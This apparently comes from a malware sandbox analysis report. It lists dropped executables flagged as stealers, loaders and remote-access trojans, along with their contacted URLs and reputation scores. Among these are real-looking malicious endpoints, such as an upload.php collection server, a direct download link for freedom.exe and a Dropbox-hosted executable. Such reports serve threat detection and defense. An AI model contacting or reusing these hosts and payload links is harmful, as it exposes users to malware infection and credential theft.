                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\crypteda[1].exe100%Joe Sandbox ML
                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\contorax[1].exe100%Joe Sandbox ML
                        C:\ProgramData\ix4A2DreBBsQwY6YHkidcDjo.exe100%Joe Sandbox ML
                        C:\Users\user\AppData\Local\Temp\1000220001\crypteda.exe100%Joe Sandbox ML
                        C:\Users\user\AppData\Local\Temp\1000142101\build2.exe100%Joe Sandbox ML
                        C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exe100%Joe Sandbox ML
                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\kitty[1].exe100%Joe Sandbox ML
                        C:\ProgramData\YAPNXRPmcarcR4ZDgC81Tbdk.exe100%Joe Sandbox ML
                        C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe100%Joe Sandbox ML
                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\random[1].exe100%Joe Sandbox ML
                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\exbuild[1].exe100%Joe Sandbox ML
                        C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exe92%ReversingLabsByteCode-MSIL.Trojan.PureLogsStealer
                        C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe84%ReversingLabsWin32.Trojan.Generic
                        C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe88%ReversingLabsWin32.Trojan.Znyonm
                        C:\ProgramData\YAPNXRPmcarcR4ZDgC81Tbdk.exe84%ReversingLabsWin32.Trojan.Generic
                        C:\ProgramData\ix4A2DreBBsQwY6YHkidcDjo.exe92%ReversingLabsByteCode-MSIL.Trojan.PureLogsStealer
                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\BowExpert[1].exe39%ReversingLabsWin32.Trojan.Generic
                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\contorax[1].exe88%ReversingLabsWin32.Trojan.Znyonm
                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\crypteda[1].exe100%ReversingLabsByteCode-MSIL.Trojan.Jalapeno
                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\GOLD[1].exe96%ReversingLabsWin32.Spyware.Redline
                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\build2[1].exe82%ReversingLabsWin32.Trojan.Znyonm
                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\channel2[1].exe71%ReversingLabsWin32.Trojan.CryptBot
                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\3546345[1].exe92%ReversingLabsWin32.Trojan.CryptBot
                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\Channel1[1].exe75%ReversingLabsWin32.Trojan.CryptBot
                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\exbuild[1].exe87%ReversingLabsWin32.Trojan.Multiverze
                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\kitty[1].exe96%ReversingLabsWin32.Trojan.Amadey
                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\meta[1].exe88%ReversingLabsWin64.Trojan.Remcos
                        C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe96%ReversingLabsWin32.Trojan.Amadey
                        C:\Users\user\AppData\Local\Temp\1000142101\build2.exe82%ReversingLabsWin32.Trojan.Znyonm
                        C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe88%ReversingLabsWin32.Trojan.Znyonm
                        C:\Users\user\AppData\Local\Temp\1000172001\3546345.exe92%ReversingLabsWin32.Trojan.CryptBot
                        C:\Users\user\AppData\Local\Temp\1000194001\meta.exe88%ReversingLabsWin64.Trojan.Remcos
                        C:\Users\user\AppData\Local\Temp\1000219001\GOLD.exe96%ReversingLabsWin32.Spyware.Redline
                        C:\Users\user\AppData\Local\Temp\1000220001\crypteda.exe100%ReversingLabsByteCode-MSIL.Trojan.Jalapeno
                        C:\Users\user\AppData\Local\Temp\1000221001\exbuild.exe87%ReversingLabsWin32.Trojan.Multiverze
                        C:\Users\user\AppData\Local\Temp\1000255001\channel2.exe71%ReversingLabsWin32.Trojan.CryptBot
                        C:\Users\user\AppData\Local\Temp\1000256001\BowExpert.exe39%ReversingLabsWin32.Trojan.Generic
                        C:\Users\user\AppData\Local\Temp\1000260001\Channel1.exe75%ReversingLabsWin32.Trojan.CryptBot
                        C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe96%ReversingLabsWin32.Trojan.Amadey
                        C:\Users\user\AppData\Local\Temp\591950\Shipment.pif5%ReversingLabs
                        C:\Users\user\AppData\Local\Temp\fed0c9a4d3\Hkbsse.exe82%ReversingLabsWin32.Trojan.Znyonm
                        C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr5%ReversingLabs
                        C:\Users\user\AppData\Roaming\D0nMCdvUeB.exe88%ReversingLabsWin32.Spyware.Multiverze
                        C:\Users\user\AppData\Roaming\WIDeqOfZq9.exe92%ReversingLabsByteCode-MSIL.Trojan.Whispergate
                        C:\Users\user\Windows.exe84%ReversingLabsWin32.Trojan.Generic
                        No Antivirus matches
                        No Antivirus matches
                        SourceDetectionScannerLabelLink
                        http://crl.microsoft0%URL Reputationsafe
                        http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence0%URL Reputationsafe
                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                        https://api.ip.sb/ip0%URL Reputationsafe
                        http://www.entrust.net/rpa030%URL Reputationsafe
                        https://aka.ms/nativeaot-compatibilityy0%URL Reputationsafe
                        http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequested0%URL Reputationsafe
                        http://schemas.xmlsoap.org/ws/2004/08/addressing0%URL Reputationsafe
                        http://crl.entrust.net/2048ca.crl00%URL Reputationsafe
                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dns0%URL Reputationsafe
                        analforeverlovyu.top0%URL Reputationsafe
                        https://api.ip.s0%URL Reputationsafe
                        http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceResponse0%URL Reputationsafe
                        http://tempuri.org/Entity/Id13Response0%URL Reputationsafe
                        http://crl.entrust.net/ts1ca.crl00%URL Reputationsafe
                        http://schemas.xmlsoap.org/ws/2005/05/identity/right/possessproperty0%URL Reputationsafe
                        http://schemas.xmlsoap.org/ws/2005/02/rm/SequenceAcknowledgement0%URL Reputationsafe
                        http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous0%URL Reputationsafe
                        http://aia.entrust.net/ts1-chain256.cer010%URL Reputationsafe
                        http://tempuri.org/Entity/Id22Response0%URL Reputationsafe
                        http://tempuri.org/Entity/Id18Response0%URL Reputationsafe
                        http://tempuri.org/Entity/Id3Response0%URL Reputationsafe
                        http://tempuri.org/Entity/Id15Responsex0%Avira URL Cloudsafe
                        http://tempuri.org/Entity/Id12Response0%Avira URL Cloudsafe
                        http://schemas.xmlsoap.org/ws/2005/02/rm0%URL Reputationsafe
                        http://thizx13vt.top/v100%Avira URL Cloudmalware
                        http://thizx13vt.top/v1/upload.phpIq100%Avira URL Cloudmalware
                        http://thizx13vt.top/g100%Avira URL Cloudmalware
                        thizx13vt.top100%Avira URL Cloudmalware
                        95.179.163.21:292570%Avira URL Cloudsafe
                        http://thizx13vt.top/j100%Avira URL Cloudmalware
                        http://tempuri.org/Entity/Id12Response2%VirustotalBrowse
                        https://www.dropbox.com/he0%Avira URL Cloudsafe
                        http://tempuri.org/Entity/Id15Responsex1%VirustotalBrowse
                        http://tempuri.org/0%Avira URL Cloudsafe
                        http://tempuri.org/Entity/Id2Response0%Avira URL Cloudsafe
                        http://tempuri.org/Entity/Id21Response0%Avira URL Cloudsafe
                        https://www.dropbox.com/0%Avira URL Cloudsafe
                        http://tempuri.org/1%VirustotalBrowse
                        http://tempuri.org/Entity/Id2Response2%VirustotalBrowse
                        http://thizx13vt.top/x100%Avira URL Cloudmalware
                        http://tempuri.org/Entity/Id10Responsex0%Avira URL Cloudsafe
                        thizx13vt.top5%VirustotalBrowse
                        https://fusionflow-meta.net:443/socket/.)0%Avira URL Cloudsafe
                        http://tempuri.org/Entity/Id13LRjq0%Avira URL Cloudsafe
                        http://tempuri.org/Entity/Id6Responsex0%Avira URL Cloudsafe
                        95.179.163.21:292578%VirustotalBrowse
                        https://discord.com/api/v9/users/0%Avira URL Cloudsafe
                        http://185.216.214.225/freedom.exe100%Avira URL Cloudmalware
                        http://tempuri.org/Entity/Id13LRjq2%VirustotalBrowse
                        http://tempuri.org/Entity/Id15Response0%Avira URL Cloudsafe
                        http://tempuri.org/Entity/Id6Responsex2%VirustotalBrowse
                        https://discord.com/api/v9/users/0%VirustotalBrowse
                        http://185.216.214.225/freedom.exe21%VirustotalBrowse
                        http://tempuri.org/Entity/Id1Responsex0%Avira URL Cloudsafe
                        https://www.dropbox.com/1%VirustotalBrowse
                        http://tempuri.org/Entity/Id3LRjq0%Avira URL Cloudsafe
                        http://schemas.xmlsoap.org/ws/2004/08/addressing/faultp90%Avira URL Cloudsafe
                        http://thizx13vt.top/v1/upload.phpM?100%Avira URL Cloudmalware
                        http://tempuri.org/Entity/Id21Response4%VirustotalBrowse
                        http://www.autoitscript.com/autoit3/J0%Avira URL Cloudsafe
                        http://schemas.xmlsoap.org/ws/2004/08/addressing/faultp90%VirustotalBrowse
                        http://tempuri.org/Entity/Id3LRjq2%VirustotalBrowse
                        http://tempuri.org/Entity/Id23Responsex0%Avira URL Cloudsafe
                        http://tempuri.org/Entity/Id15Response2%VirustotalBrowse
                        http://tempuri.org/Entity/Id10Responsex1%VirustotalBrowse
                        https://fusionflow-meta.net:443/socket/34220%Avira URL Cloudsafe
                        http://tempuri.org/Entity/Id6LRjq(0%Avira URL Cloudsafe
                        http://tempuri.org/Entity/Id20Responsex0%Avira URL Cloudsafe
                        http://thizx13vt.top:80/v1/upload.phpraz100%Avira URL Cloudmalware
                        https://direct-link.net/1218649/browse-and-buy-cs2-skins0%Avira URL Cloudsafe
                        http://tempuri.org/Entity/Id23Responsex1%VirustotalBrowse
                        http://tempuri.org/Entity/Id24Response0%Avira URL Cloudsafe
                        https://pastebin.com/raw/fiLr6dSt0%Avira URL Cloudsafe
                        http://tempuri.org/Entity/Id1Responsex1%VirustotalBrowse
                        http://tempuri.org/Entity/Id8Responsex0%Avira URL Cloudsafe
                        http://tempuri.org/Entity/Id24Response1%VirustotalBrowse
                        https://fusionflow-meta.net/1G0%Avira URL Cloudsafe
                        http://www.autoitscript.com/autoit3/J0%VirustotalBrowse
                        http://tempuri.org/Entity/Id17LRjq0%Avira URL Cloudsafe
                        http://tempuri.org/Entity/Id20Responsex1%VirustotalBrowse
                        https://direct-link.net/1218649/browse-and-buy-cs2-skins0%VirustotalBrowse
                        http://tempuri.org/Entity/Id3Responsex0%Avira URL Cloudsafe
                        http://tempuri.org/Entity/Id6LRjq(1%VirustotalBrowse
                        http://thizx13vt.top/v1/upload.php%qN100%Avira URL Cloudmalware
                        http://thizx13vt.top/v1/upload.phpsrJG100%Avira URL Cloudmalware
                        http://pastebin.com0%Avira URL Cloudsafe
                        https://pastebin.com/raw/fiLr6dSt1%VirustotalBrowse
                        http://tempuri.org/Entity/Id12Responsex0%Avira URL Cloudsafe
                        http://tempuri.org/Entity/Id3Responsex2%VirustotalBrowse
                        http://tempuri.org/Entity/Id17Responsex0%Avira URL Cloudsafe
                        http://tempuri.org/Entity/Id8Responsex1%VirustotalBrowse
                        http://tempuri.org/Entity/Id5Response0%Avira URL Cloudsafe
                        https://aka.ms/nativeaot-compatibilityh0%Avira URL Cloudsafe
                        http://tempuri.org/Entity/Id10Response0%Avira URL Cloudsafe
                        http://tempuri.org/Entity/Id8Response0%Avira URL Cloudsafe
                        https://www.dropbox.com/scl/fi/rqsnrl6msilfirz1qp1pn/weetwegsdg.exe?rlkey=rmj9i20g87wwdvd6wsdaypie2&0%Avira URL Cloudsafe
                        http://tempuri.org/Entity/Id17LRjq2%VirustotalBrowse
                        +#thizx13vt.top0%Avira URL Cloudsafe
                        http://tempuri.org/Entity/Id24LRjq0%Avira URL Cloudsafe
                        No contacted domains info
                        NameMaliciousAntivirus DetectionReputation
                        thizx13vt.toptrue
                        • 5%, Virustotal, Browse
                        • Avira URL Cloud: malware
                        unknown
                        95.179.163.21:29257true
                        • 8%, Virustotal, Browse
                        • Avira URL Cloud: safe
                        unknown
                        analforeverlovyu.toptrue
                        • URL Reputation: safe
                        unknown
                        +#thizx13vt.toptrue
                        • Avira URL Cloud: safe
                        unknown
                        t.toptrue
                        • Avira URL Cloud: safe
                        unknown
                        exonic-hacks.comtrue
                        • Avira URL Cloud: safe
                        unknown
                        NameSourceMaliciousAntivirus DetectionReputation
                        http://thizx13vt.top/v3546345.exe, 00000025.00000002.4775255269.0000000002380000.00000004.00000020.00020000.00000000.sdmptrue
                        • Avira URL Cloud: malware
                        unknown
                        http://crl.microsoftCerker.exe, 0000001C.00000003.3385926643.000000000121B000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000001C.00000003.3382418323.000000000121B000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000001C.00000003.3386987728.000000000121B000.00000004.00000020.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        http://thizx13vt.top/v1/upload.phpIq3546345.exe, 00000025.00000002.4775867809.00000000023FF000.00000004.00000020.00020000.00000000.sdmptrue
                        • Avira URL Cloud: malware
                        unknown
                        http://tempuri.org/Entity/Id12ResponseRegAsm.exe, 0000002E.00000002.4755857564.0000000002E40000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002F44000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002EEB000.00000004.00000800.00020000.00000000.sdmpfalse
                        • 2%, Virustotal, Browse
                        • Avira URL Cloud: safe
                        unknown
                        http://tempuri.org/Entity/Id15ResponsexRegAsm.exe, 0000002E.00000002.4755857564.0000000002F93000.00000004.00000800.00020000.00000000.sdmpfalse
                        • 1%, Virustotal, Browse
                        • Avira URL Cloud: safe
                        unknown
                        http://thizx13vt.top/g3546345.exe, 00000025.00000002.4775255269.0000000002380000.00000004.00000020.00020000.00000000.sdmptrue
                        • Avira URL Cloud: malware
                        unknown
                        http://thizx13vt.top/j3546345.exe, 00000025.00000002.4775255269.0000000002380000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: malware
                        unknown
                        https://www.dropbox.com/heCerker.exe, 00000022.00000003.3445287126.0000000000C9D000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://tempuri.org/RegAsm.exe, 0000002E.00000002.4755857564.0000000002DB1000.00000004.00000800.00020000.00000000.sdmpfalse
                        • 1%, Virustotal, Browse
                        • Avira URL Cloud: safe
                        unknown
                        http://tempuri.org/Entity/Id2ResponseRegAsm.exe, 0000002E.00000002.4755857564.0000000002E40000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002F44000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002EEB000.00000004.00000800.00020000.00000000.sdmpfalse
                        • 2%, Virustotal, Browse
                        • Avira URL Cloud: safe
                        unknown
                        http://tempuri.org/Entity/Id21ResponseRegAsm.exe, 0000002E.00000002.4755857564.0000000002E40000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002F44000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002EEB000.00000004.00000800.00020000.00000000.sdmpfalse
                        • 4%, Virustotal, Browse
                        • Avira URL Cloud: safe
                        unknown
                        https://www.dropbox.com/Cerker.exe, 0000001C.00000003.3509353341.0000000001219000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 00000022.00000002.4622434555.0000000000C6F000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 00000022.00000003.3445287126.0000000000CF5000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 00000022.00000002.4622434555.0000000000C93000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 00000022.00000003.3445287126.0000000000C9D000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 00000022.00000003.3429372925.0000000000CF7000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 00000022.00000002.4622434555.0000000000D01000.00000004.00000020.00020000.00000000.sdmpfalse
                        • 1%, Virustotal, Browse
                        • Avira URL Cloud: safe
                        unknown
                        http://thizx13vt.top/x3546345.exe, 00000025.00000002.4775255269.0000000002380000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: malware
                        unknown
                        http://tempuri.org/Entity/Id10ResponsexRegAsm.exe, 0000002E.00000002.4755857564.0000000002F93000.00000004.00000800.00020000.00000000.sdmpfalse
                        • 1%, Virustotal, Browse
                        • Avira URL Cloud: safe
                        unknown
                        https://fusionflow-meta.net:443/socket/.)Cerker.exe, 0000001C.00000002.4585160635.0000000000DAA000.00000004.00000010.00020000.00000000.sdmp, Cerker.exe, 00000022.00000002.4605809813.0000000000AFA000.00000004.00000010.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequenceRegAsm.exe, 0000002E.00000002.4755857564.0000000002E40000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        http://tempuri.org/Entity/Id13LRjqRegAsm.exe, 0000002E.00000002.4755857564.0000000002F93000.00000004.00000800.00020000.00000000.sdmpfalse
                        • 2%, Virustotal, Browse
                        • Avira URL Cloud: safe
                        unknown
                        http://tempuri.org/Entity/Id6ResponsexRegAsm.exe, 0000002E.00000002.4755857564.0000000002F93000.00000004.00000800.00020000.00000000.sdmpfalse
                        • 2%, Virustotal, Browse
                        • Avira URL Cloud: safe
                        unknown
                        https://discord.com/api/v9/users/InstallUtil.exe, 00000032.00000002.3758938143.00000000033CE000.00000004.00000800.00020000.00000000.sdmpfalse
                        • 0%, Virustotal, Browse
                        • Avira URL Cloud: safe
                        unknown
                        http://185.216.214.225/freedom.exeCerker.exe, 0000001C.00000003.4059843797.0000000001215000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000001C.00000002.4613814551.0000000001215000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000001C.00000003.4190412440.0000000001215000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000001C.00000003.3509353341.0000000001219000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 00000022.00000002.4622434555.0000000000CE2000.00000004.00000020.00020000.00000000.sdmpfalse
                        • 21%, Virustotal, Browse
                        • Avira URL Cloud: malware
                        unknown
                        http://tempuri.org/Entity/Id15ResponseRegAsm.exe, 0000002E.00000002.4755857564.0000000002E40000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002F44000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002EEB000.00000004.00000800.00020000.00000000.sdmpfalse
                        • 2%, Virustotal, Browse
                        • Avira URL Cloud: safe
                        unknown
                        http://tempuri.org/Entity/Id1ResponsexRegAsm.exe, 0000002E.00000002.4755857564.0000000002F93000.00000004.00000800.00020000.00000000.sdmpfalse
                        • 1%, Virustotal, Browse
                        • Avira URL Cloud: safe
                        unknown
                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namewinmsbt.exe, 00000021.00000002.4712142699.0000000003031000.00000004.00000800.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 0000002A.00000002.4674057559.0000000002DE1000.00000004.00000800.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 0000002A.00000002.4674057559.0000000002E38000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        http://tempuri.org/Entity/Id3LRjqRegAsm.exe, 0000002E.00000002.4755857564.0000000002F93000.00000004.00000800.00020000.00000000.sdmpfalse
                        • 2%, Virustotal, Browse
                        • Avira URL Cloud: safe
                        unknown
                        http://schemas.xmlsoap.org/ws/2004/08/addressing/faultp9RegAsm.exe, 0000002E.00000002.4755857564.0000000002E40000.00000004.00000800.00020000.00000000.sdmpfalse
                        • 0%, Virustotal, Browse
                        • Avira URL Cloud: safe
                        unknown
                        http://thizx13vt.top/v1/upload.phpM?3546345.exe, 00000025.00000002.4774750155.0000000001280000.00000004.00000020.00020000.00000000.sdmptrue
                        • Avira URL Cloud: malware
                        unknown
                        http://www.autoitscript.com/autoit3/JShipment.pif, 0000000B.00000000.2048576959.0000000000A19000.00000002.00000001.01000000.00000006.sdmp, Shipment.pif, 0000000B.00000003.2056731275.00000000046B2000.00000004.00000800.00020000.00000000.sdmp, GuardTrack.scr, 00000013.00000000.2074054599.0000000000679000.00000002.00000001.01000000.00000008.sdmp, GuardTrack.scr, 00000015.00000000.2161600759.0000000000679000.00000002.00000001.01000000.00000008.sdmp, Shipment.pif.1.dr, GuardTrack.scr.11.dr, Scottish.0.drfalse
                        • 0%, Virustotal, Browse
                        • Avira URL Cloud: safe
                        unknown
                        https://api.ip.sb/ipInstallUtil.exe, 00000032.00000002.3758938143.000000000333A000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000033.00000002.3597562499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, WIDeqOfZq9.exe.51.drfalse
                        • URL Reputation: safe
                        unknown
                        http://tempuri.org/Entity/Id23ResponsexRegAsm.exe, 0000002E.00000002.4755857564.0000000002F93000.00000004.00000800.00020000.00000000.sdmpfalse
                        • 1%, Virustotal, Browse
                        • Avira URL Cloud: safe
                        unknown
                        https://fusionflow-meta.net:443/socket/3422Cerker.exe, 00000022.00000002.4622434555.0000000000C6F000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://www.entrust.net/rpa03GOLD.exe.11.dr, GOLD[1].exe.11.dr, crypteda[1].exe.11.drfalse
                        • URL Reputation: safe
                        unknown
                        http://tempuri.org/Entity/Id6LRjq(RegAsm.exe, 0000002E.00000002.4755857564.0000000002F93000.00000004.00000800.00020000.00000000.sdmpfalse
                        • 1%, Virustotal, Browse
                        • Avira URL Cloud: safe
                        unknown
                        https://aka.ms/nativeaot-compatibilityymeta.exe, 00000027.00000002.3873284492.00007FF617EB7000.00000002.00000001.01000000.00000013.sdmp, meta.exe, 00000027.00000002.3650886377.00000220BB800000.00000004.00001000.00020000.00000000.sdmp, meta.exe, 00000027.00000000.3447262254.00007FF617EB7000.00000002.00000001.01000000.00000013.sdmp, meta.exe, 00000027.00000002.3650886377.00000220BC200000.00000004.00001000.00020000.00000000.sdmp, meta.exe.11.dr, meta[1].exe.11.drfalse
                        • URL Reputation: safe
                        unknown
                        http://tempuri.org/Entity/Id20ResponsexRegAsm.exe, 0000002E.00000002.4755857564.0000000002F93000.00000004.00000800.00020000.00000000.sdmpfalse
                        • 1%, Virustotal, Browse
                        • Avira URL Cloud: safe
                        unknown
                        http://thizx13vt.top:80/v1/upload.phpraz3546345.exe, 00000025.00000002.4774750155.0000000001280000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: malware
                        unknown
                        https://direct-link.net/1218649/browse-and-buy-cs2-skinswinmsbt.exe, 00000021.00000002.4712142699.0000000003289000.00000004.00000800.00020000.00000000.sdmpfalse
                        • 0%, Virustotal, Browse
                        • Avira URL Cloud: safe
                        unknown
                        http://tempuri.org/Entity/Id24ResponseRegAsm.exe, 0000002E.00000002.4755857564.0000000002E40000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002F44000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002EEB000.00000004.00000800.00020000.00000000.sdmpfalse
                        • 1%, Virustotal, Browse
                        • Avira URL Cloud: safe
                        unknown
                        https://pastebin.com/raw/fiLr6dStwinmsbt.exe, 00000021.00000002.4712142699.0000000003031000.00000004.00000800.00020000.00000000.sdmpfalse
                        • 1%, Virustotal, Browse
                        • Avira URL Cloud: safe
                        unknown
                        http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequestedRegAsm.exe, 0000002E.00000002.4755857564.0000000002E40000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        http://tempuri.org/Entity/Id8ResponsexRegAsm.exe, 0000002E.00000002.4755857564.0000000002F93000.00000004.00000800.00020000.00000000.sdmpfalse
                        • 1%, Virustotal, Browse
                        • Avira URL Cloud: safe
                        unknown
                        https://fusionflow-meta.net/1GCerker.exe, 0000001C.00000003.3385926643.000000000121B000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000001C.00000003.3382418323.000000000121B000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000001C.00000003.3386987728.000000000121B000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://schemas.xmlsoap.org/ws/2004/08/addressingRegAsm.exe, 0000002E.00000002.4755857564.0000000002E40000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        http://tempuri.org/Entity/Id17LRjqRegAsm.exe, 0000002E.00000002.4755857564.0000000002F93000.00000004.00000800.00020000.00000000.sdmpfalse
                        • 2%, Virustotal, Browse
                        • Avira URL Cloud: safe
                        unknown
                        http://tempuri.org/Entity/Id3ResponsexRegAsm.exe, 0000002E.00000002.4755857564.0000000002F93000.00000004.00000800.00020000.00000000.sdmpfalse
                        • 2%, Virustotal, Browse
                        • Avira URL Cloud: safe
                        unknown
                        http://thizx13vt.top/v1/upload.php%qN3546345.exe, 00000025.00000002.4775867809.00000000023FF000.00000004.00000020.00020000.00000000.sdmptrue
                        • Avira URL Cloud: malware
                        unknown
                        https://aka.ms/nativeaot-compatibilityYmeta[1].exe.11.drfalse
                          unknown
                          http://thizx13vt.top/v1/upload.phpsrJG3546345.exe, 00000025.00000002.4763090277.0000000001155000.00000004.00000020.00020000.00000000.sdmptrue
                          • Avira URL Cloud: malware
                          unknown
                          http://pastebin.comwinmsbt.exe, 00000021.00000002.4712142699.0000000003234000.00000004.00000800.00020000.00000000.sdmp, winmsbt.exe, 00000021.00000002.4712142699.00000000031DF000.00000004.00000800.00020000.00000000.sdmp, winmsbt.exe, 00000021.00000002.4712142699.00000000031B0000.00000004.00000800.00020000.00000000.sdmp, winmsbt.exe, 00000021.00000002.4712142699.00000000032F2000.00000004.00000800.00020000.00000000.sdmp, winmsbt.exe, 00000021.00000002.4712142699.0000000003411000.00000004.00000800.00020000.00000000.sdmp, winmsbt.exe, 00000021.00000002.4712142699.000000000325F000.00000004.00000800.00020000.00000000.sdmp, winmsbt.exe, 00000021.00000002.4712142699.000000000331B000.00000004.00000800.00020000.00000000.sdmp, winmsbt.exe, 00000021.00000002.4712142699.000000000320A000.00000004.00000800.00020000.00000000.sdmp, winmsbt.exe, 00000021.00000002.4712142699.00000000032B3000.00000004.00000800.00020000.00000000.sdmp, winmsbt.exe, 00000021.00000002.4712142699.000000000336A000.00000004.00000800.00020000.00000000.sdmp, winmsbt.exe, 00000021.00000002.4712142699.0000000003289000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://tempuri.org/Entity/Id12ResponsexRegAsm.exe, 0000002E.00000002.4755857564.0000000002F93000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://tempuri.org/Entity/Id17ResponsexRegAsm.exe, 0000002E.00000002.4755857564.0000000002F93000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://tempuri.org/Entity/Id5ResponseRegAsm.exe, 0000002E.00000002.4755857564.0000000002E40000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002F44000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002EEB000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://crl.entrust.net/2048ca.crl0GOLD.exe.11.dr, GOLD[1].exe.11.dr, crypteda[1].exe.11.drfalse
                          • URL Reputation: safe
                          unknown
                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dnsRegAsm.exe, 0000002E.00000002.4755857564.0000000002E40000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          https://aka.ms/nativeaot-compatibilityhmeta.exe, 00000027.00000002.3872094991.00007FF617E51000.00000004.00000001.01000000.00000013.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://tempuri.org/Entity/Id10ResponseRegAsm.exe, 0000002E.00000002.4755857564.0000000002E40000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002F44000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002EEB000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
